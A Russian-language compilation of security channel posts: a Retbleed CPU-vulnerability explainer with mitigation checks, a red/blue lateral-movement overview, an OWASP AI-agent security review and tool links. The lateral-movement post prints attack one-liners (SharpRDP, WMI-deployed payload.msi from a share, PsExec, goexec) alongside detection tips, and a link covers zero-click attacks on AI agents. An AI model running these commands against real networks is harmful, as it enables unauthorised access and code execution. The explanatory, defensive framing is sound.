Fsecurity | HH

Retbleed: Google показала как красть память любого процесса #google #AMD #Intel #CPU #hardware Исследователи Google продемонстрировали значительно улучшенный эксплойт уязвимости Retbleed, который позволяет читать память любого процесса на современных CPU AMD и Intel. Скорость кражи данных достигает 13 КБ/с даже из песочницы. Retbleed - это уязвимость в современных процессорах, обнаруженная в 2022 году исследователями ETH Zürich. Она использует спекулятивное выполнение инструкций - технологию, которая позволяет CPU предсказывать и выполнять команды заранее для повышения производительности. Что такое спекулятивное выполнение: Современные процессоры не ждут подтверждения каждой инструкции, а выполняют их "на опережение" основываясь на предсказаниях. Это как читать следующую страницу книги, пока обдумываете предыдущую. Если предсказание оказалось неверным, результат отбрасывается, но следы остаются в кэше процессора. ➡️Механизм атаки: Шаг 1: Обучение предсказателя Атакующий "тренирует" систему предсказания переходов процессора, заставляя её ожидать определенные адреса памяти при выполнении return-инструкций. Шаг 2: Спекулятивное выполнение Когда процессор встречает return, он спекулятивно выполняет код по предсказанному адресу, даже если этот адрес содержит данные жертвы. Шаг 3: Извлечение через кэш Хотя результат спекулятивного выполнения отбрасывается, данные остаются в кэше. Атакующий анализирует время доступа к памяти и восстанавливает украденную информацию. ➡️Улучшения Google: Оригинальный эксплойт Retbleed работал только в лабораторных условиях. Команда Google (Matteo Rizzo и Andy Nguyen) решила три критические проблемы: Обход KASLR: Kernel Address Space Layout Randomization рандомизирует расположение кода ядра в памяти. Исследователи использовали микроархитектурные side-channel атаки для определения реальных адресов. Создание идеальных гаджетов: Через спекулятивное ROP (Return Oriented Programming) они научились создавать оптимальные последовательности инструкций для утечки данных. ➡️Работа в песочнице: Эксплойт функционирует даже в строго ограниченной среде без привилегий, что делает его особенно опасным. ➡️Практические результаты: - Скорость утечки: ~13 КБ/с с высокой точностью - Работает из непривилегированного процесса в песочнице - Позволяет перечислить все запущенные процессы и VM - Может красть криптографические ключи и другие чувствительные данные - Работает из виртуальных машин для кражи данных хоста ➡️Интересные факты: Эксплойт работает против AMD Zen 2 процессоров, которые широко используются в облачных сервисах. Это означает, что один арендатор облака потенциально может читать данные других. Особенно опасно то, что атака работает из виртуальных машин - гость может красть данные хоста, что нарушает основы изоляции в облачных средах. ➡️Защитные меры: Существующие митигации дорогостоящие и значительно влияют на производительность: Микрокод процессора: AMD и Intel выпустили обновления микрокода, но они замедляют работу на 10-20%. Отключение спекулятивного выполнения: Радикальная мера, которая может снизить производительность на 30-50%. Изоляция процессов: Усиленная изоляция между процессами и виртуальными машинами. ➡️Проверка уязвимости:

# Проверка статуса митигаций Retbleed
cat /sys/devices/system/cpu/vulnerabilities/retbleed

# Проверка версии микрокода
grep microcode /proc/cpuinfo

➡️Настройки ядра:

# Включение всех митигаций (влияет на производительность)
echo "retbleed=auto" >> /etc/default/grub
update-grub

➡️Источники: Google Bug Hunters PoC 🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://opennet.ru/63710/

Сегодня у меня была встреча с Mahiro, кто-то знает его под другим псевдонимом. Кто знает, тот знает. Мне было приятно увидеться с ним 👾 Мы также обсудили рабочие и личные моменты. Встреча была недолгой из-за неожиданных изменений. Буду надеяться, как и Mahiro, на следующую встречу 🤝 🔗 Ссылка: https://t.me/mahirosshelter

Админ в отпуске 👾

Горизонтальное перемещение: тени в инфраструктуре

Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.

Продолжаем говорить про перемещение, сегодня будут интересные утилиты. Тихий проход через Headless RDP 😑 Представьте: вы хотите попасть с одной машины на другую, но не размахивая флагом в логах. Один из элегантных способов — Headless RDP через SharpRDP. Команда:

SharpRDP.exe computername=DC01 command=calc username=OFFENSE\admin password=Passw0rd

Вот и вы уже запускаете код на удаленном узле, без графического окна и лишних признаков. Защитникам в таких случаях стоит обращать внимание на неожиданные загрузки mstscax.dll или RDP-трафик без интерактивной сессии. WMI с MSI: установка, которая не то, чем кажется 🤯 Другой и один из любимых методов — WMI с деплоем MSI. С точки зрения системы, это установка пакета, но внутри — полезная нагрузка:

Invoke-WmiMethod -Path Win32_Product -Name Install -ArgumentList @($true,"","\\192.168.1.4\share\payload.msi") -ComputerName TARGET -Credential $cred

Стороне атаки такой способ дает тишину, стороне защиты — повод мониторить необычные MSI-установки через WMI. PsExec: громкий, но надежный 🍞 Но нельзя обойти стороной и классику — PsExec. Это инструмент, который админы обожают за удобство, а синие команды — за предсказуемые следы. Запуск может выглядеть так:

PsExec.exe \\TARGET -u Domain\Admin -p P@ssword cmd.exe

Быстро, просто… и громко: появляется служба PSEXESVC, фиксируется SMB-трафик, остаются артефакты. Опытный атакующий может переименовать службу, очистить следы или использовать модифицированные версии. Опытный защитник — найдет их по событию 7045, именованным каналам \\.\pipe\psexesvc и подозрительным RPC-запросам. GoExec: современный шпион 👀 Тем, кто ценит тишину, стоит взглянуть на GoExec — современный аналог, умеющий работать через прокси и минимизировать новые артефакты. Он не так распространен, поэтому часто проходит под радаром:

goexec --method scmr change --proxy 127.0.0.1:1080 TARGET_IP command.exe

Для атакующего — это способ двигаться в полутьме, для защитника — повод расширить поведенческую аналитику. Как итог 🍩 Весь этот арсенал объединяет простая логика: чем ближе способ к легитимной административной операции, тем сложнее его заметить. Для красных команд это значит — мимикрировать под штатную работу админа. Для синих — изучить эти «будни администратора» так, чтобы любое несоответствие бросалось в глаза. Если вы дочитали до этого места — значит, вам точно интересна эта кухня. Поддержите статью лайком и подпишитесь на канал — впереди еще больше разборов, техник и историй с обеих сторон.

🔗Ссылка: https://habr.com/ru/companies/dsol/articles/935072/

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://www.securitylab.ru/news/562262.php

🔗Ссылка: https://opennet.ru/63702/

🔗Ссылка: https://www.securitylab.ru/news/562229.php

Подъехала презентация со всеми деталями про 0click ai agent exploits. Однозначно заслуживает внимательного прочтения! Теперь это класс атак, которые надо учитывать при разработке и имплементации каких-то решений. https://www.mbgsec.com/posts/2025-08-08-enterprise-ai-compromise-0click-exploit-methods-sneak-peek/

🔗Ссылка: https://opennet.ru/63699/

📸 Безопасность агентов от OWASP #иб_для_ml Прошедшие пару недель выдались жаркими на анонсы OWASP по AI Security. Организация представила сразу три документа, которые стоит прочитать всем, кто так или иначе работает с GenAI-моделями и AI-агентами: «Securing Agentic Apps Guide», «GenAI Incident Response Guide» и «State of Agentic AI Security and Governance». Эти работы можно назвать исчерпывающим собранием знаний о практической безопасности AI-агентов и просто GenAI на сегодня. 👤 Начну с личных впечатлений. Данные документы однозначно позволят человеку без подготовки в AI Security погрузиться в тему безопасности AI-агентов. Но при этом потребуются знания по классической кибербезопасности и/или искусственному интеллекту. Рассмотрено много сателлитных тем, напрямую не относящихся к теме того или иного дока - это одновременно и плюс, и минус. Раскрытие информации постепенное, то есть про те же рантайм проверки в IR Guide расписано сначала в общих чертах, спустя 5-10 страниц подробнее, и потом через еще сколько-то - еще подробнее. Итого - к ознакомлению рекомендую, но в идеале хотелось бы увидеть то же самое от авторов, только не по 80+ страниц каждый док, а хотя бы по 30. Теперь фактура ⏺ В «Securing Agentic Apps Guide» собран перечень актуальных фреймворков для тестирования агентов — от знакомого нам AgentDojo до более свежих AgentFence, ASB, MAPS и AgentPoison. OWASP систематизировала меры безопасности по всем этапам жизненного цикла: проектирование, развертывание, эксплуатация. Для рантайма советуют искать аномалии в тексте промптов, частоте и параметрах вызова тулов, снижать объём памяти агента как ответ на инциденты (это мне прям понравилось, новая мысль), задавать срок жизни чувствительных данных (тоже новенькое), ограничивать размер контекстного окна, стирать память при смене темы и вообще никогда не допускать попадания в промпт секретов из списка на 12 пунктов. Доступ к инструментам рекомендуется делать по Just-In-Time модели с ephemeral credentials, хотя механика триггеров включения/отключения пока не прописана. 🔃 «GenAI Incident Response Guide» — руководство по реагированию на инциденты в GenAI, полезное, прежде всего, организациям с молодой кибербезопасностью (где SOC и DevSecOps только строятся). Приведены меры сдерживания (пометки на аномальных сессиях, canary-prompts для защиты системного промпта, троттлинг подключений к модели), но они куда менее интересные, имхо, чем в Securing Apps. Перечислили IoC для GenAI-инцидентов: всевозможные аномалии потоков входа/выхода GenAI-моделей, наличие PII в ответах, хэши популярных атакующих запросов. Далее авторы пустились в полет фантазии: и методика оценки рисков, и примеры для дашбордов SOC для AI, и еще куча всего. Описана модель зрелости SOC для AI с необходимыми шагами для "эволюции". Полезной могу отметить матрицу расчёта критичности AI-инцидентов по пяти направлениям, по которой можно определять скорость реагирования на инцидент, состав команды и масштаб пост-инцидентных мер. Но что меня расстроило, так это как раз таки полное отсутствие специфики AI-агентов. Недоработали OWASP тут. ⚙ В «State of Agentic AI Security and Governance» OWASP рассматривается рынок фреймворков и механизмов защиты. Дан обзор безопасности open-source решений вроде dify, autogen, crewai у многих есть гардрейлы, а в Letta, OpenAI Agents SDK, Google ADK и т.д.. Проприетарные платформы тоже не обошли вниманием: AWS Bedrock Agents фильтрует контент и ограничивает действия агентов, SF Agentforce блокирует оффтоп и галлюцинации и маскирует доменные данные, Azure AI Foundry предоставляет дашборды рисков, инструменты для AI Red Teaming и DLP, IBM Watsonx Orchestrate — детектор неэтичности, управление ЖЦ агента и интеграция с Splunk/QRadar, Google Vertex AI Agent Builder — фильтры, агентный IAM и анализ reasoning-логов. Упомянуты и протоколы агентов, но анализ на безопасность меня не впечатлил. Завершают документ прогнозы по развитию compliance-практик, но они для России полностью нерелвантны, к сожалению.

🧰 Awesome SysAdmin — список лучших open-source инструментов для системных администраторов Если ты занимаешься DevOps, Linux или IT-инфраструктурой — этот репозиторий для тебя. Это один из самых полных и актуальных каталогов open-source инструментов по темам: 🔧 Monitoring (Prometheus, Netdata) 🔐 Security & Identity (Keycloak, CrowdSec) 🗃 Backup & Recovery (Borg, Restic) 🕸 Networking, DNS, VPN 🧱 Containers & Orchestration (Docker, Kubernetes) 📈 Logging, Metrics, Dashboards 🧰 Troubleshooting, Tuning и многое другое Подборки удобно структурированы по тематикам, есть ссылки на проекты, описание и лицензии. 📎 GitHub

Вот такое расширение AxScript подкинули, для удобства разработки скриптов в VS Code. https://github.com/5P34R/axs-extension